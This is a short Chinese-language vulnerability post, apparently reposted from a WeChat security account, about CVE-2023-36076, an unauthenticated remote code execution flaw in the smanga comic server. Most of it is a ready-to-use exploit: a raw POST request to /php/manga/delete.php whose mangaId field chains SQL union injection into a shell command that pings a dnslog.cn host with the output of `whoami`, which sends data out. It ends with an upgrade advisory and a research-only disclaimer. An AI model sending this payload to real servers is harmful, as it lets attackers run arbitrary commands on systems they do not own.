0x01 前言
smanga存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。
0x02 漏洞等级
高危0x03 漏洞影响
smanga系统0x04 漏洞复现
登录界面是这个样子~~~
环境搭建可以参考这个:
https://www.bilibili.com/read/cv21910784/EXP:
POST/php/manga/delete.phpHTTP/1.1Host: 127.0.0.1:8181Content-Length: 360Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1:8181Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://127.0.0.1:8181/php/manga/delete.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closemangaId=1+union+select+*+from+%28select+1%29a+join+%28select+2%29b+join+%28select+3%29c+join+%28select+4%29d+join+%28select+%27%5C%22%3Bping+-c+3+%60whoami%60.uoi9vt.dnslog.cn%3B%5C%22%27%29e+join+%28select+6%29f+join+%28select+7%29g+join+%28select+8%29h+join+%28select+9%29i+join+%28select+10%29j+join+%28select+11%29k+join+%28select+12%29l%3B&deleteFile=true
命令执行成功
0x05 修复建议
官方已经发布修复补丁,请进行升级。
原文始发于微信公众号(渗透安全团队):CVE-2023-36076 RCE漏洞(附EXP)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论